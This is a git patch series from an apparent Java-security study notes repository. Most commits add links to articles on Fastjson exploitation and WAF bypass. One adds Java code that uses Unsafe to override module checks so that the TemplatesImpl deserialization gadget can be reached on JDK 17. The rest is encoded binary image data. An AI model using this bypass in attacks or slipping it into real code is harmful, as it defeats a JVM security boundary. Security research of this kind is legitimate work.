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
ff7xAsPtTop+;pU7VkQGWHialZRaYpLHw*k
Date: Sat, 17 Dec 2022 17:57:05 +0800
Subject: [PATCH 144/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 2e0bfa2..bb3b049 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -215,3 +215,4 @@
+ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds*
+ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ)
+ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf)
++ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了
From 2c8c93cab4d975230e7fb9c1d809e23496c629cf Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Dec 2022 23:59:21 +0800
Subject: [PATCH 145/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index bb3b049..4b3831d 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -216,3 +216,4 @@
+ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ)
+ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf)
+ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了
++ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过**
From cf526c6b9e18f7f4b286ef8b676665667e455ac6 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 18 Dec 2022 13:04:39 +0800
Subject: [PATCH 146/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 4b3831d..f3aa154 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -217,3 +217,4 @@
+ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf)
+ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了
+ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过**
++ 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会**
From 667d8c3134bfbfec9e8b43ed0adc5921b1a34ec1 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 21 Dec 2022 16:12:46 +0800
Subject: [PATCH 147/257] =?UTF-8?q?Create=20jdk17=E7=BB=95=E8=BF=87Module.?=
=?UTF-8?q?md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../jdk17\347\273\225\350\277\207Module.md" | 99 +++++++++++++++++++
1 file changed, 99 insertions(+)
create mode 100644 "java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md"
diff --git "a/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md"
new file mode 100644
index 0000000..dbd2d4e
--- /dev/null
+++ "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md"
@@ -0,0 +1,99 @@
+# jdk17 bypass module
+
+https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/
+
+https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java
+
+在jdk17使用反序列化的时候发现要报错
+
+```
+InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed
+```
+
+
+
+限制了
+
+
+
+限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated
+
+## 需要bypass
+
+```
+按照提案的说明,被严格限制的这些内部 API 包括:
+
+java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。
+sun.* 下的所有类及其成员都是内部 API。
+绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。
+```
+
+**code**
+
+```java
+
+import sun.misc.Unsafe;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.util.ArrayList;
+
+/**
+ * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated
+ */
+public class BypassModule {
+ public static void main(String[] args) throws Exception {
+ final ArrayList classes = new ArrayList<>();
+ classes.add(Class.forName("java.lang.reflect.Field"));
+ classes.add(Class.forName("java.lang.reflect.Method"));
+ Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
+ classes.add(aClass);
+ new BypassModule().bypassModule(classes);
+ aClass.newInstance();
+ }
+
+ public void bypassModule(ArrayList classes){
+ try {
+ Unsafe unsafe = getUnsafe();
+ Class currentClass = this.getClass();
+ try {
+ Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]);
+ if (getModuleMethod != null) {
+ for (Class aClass : classes) {
+ Object targetModule = getModuleMethod.invoke(aClass, new Object[]{});
+ unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule);
+ }
+ }
+ }catch (Exception e) {
+ }
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ }
+
+ private static Method getMethod(Class clazz,String methodName,Class[] params) {
+ Method method = null;
+ while (clazz!=null){
+ try {
+ method = clazz.getDeclaredMethod(methodName,params);
+ break;
+ }catch (NoSuchMethodException e){
+ clazz = clazz.getSuperclass();
+ }
+ }
+ return method;
+ }
+
+ private static Unsafe getUnsafe() {
+ Unsafe unsafe = null;
+ try {
+ Field field = Unsafe.class.getDeclaredField("theUnsafe");
+ field.setAccessible(true);
+ unsafe = (Unsafe) field.get(null);
+ } catch (Exception e) {
+ throw new AssertionError(e);
+ }
+ return unsafe;
+ }
+}
+```
+
From 23663113e7379fcb4a82734418991f114bcccb73 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 21 Dec 2022 16:13:21 +0800
Subject: [PATCH 148/257] Add files via upload
---
.../img/image-20221220230825845.png" | Bin 0 -> 88141 bytes
.../img/image-20221220233047039.png" | Bin 0 -> 130319 bytes
2 files changed, 0 insertions(+), 0 deletions(-)
create mode 100644 "java\346\227\245\345\270\270/img/image-20221220230825845.png"
create mode 100644 "java\346\227\245\345\270\270/img/image-20221220233047039.png"
diff --git "a/java\346\227\245\345\270\270/img/image-20221220230825845.png" "b/java\346\227\245\345\270\270/img/image-20221220230825845.png"
new file mode 100644
index 0000000000000000000000000000000000000000..3d05b8e54a8c9df34ea91fd3311d710efb20620b
GIT binary patch
literal 88141
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
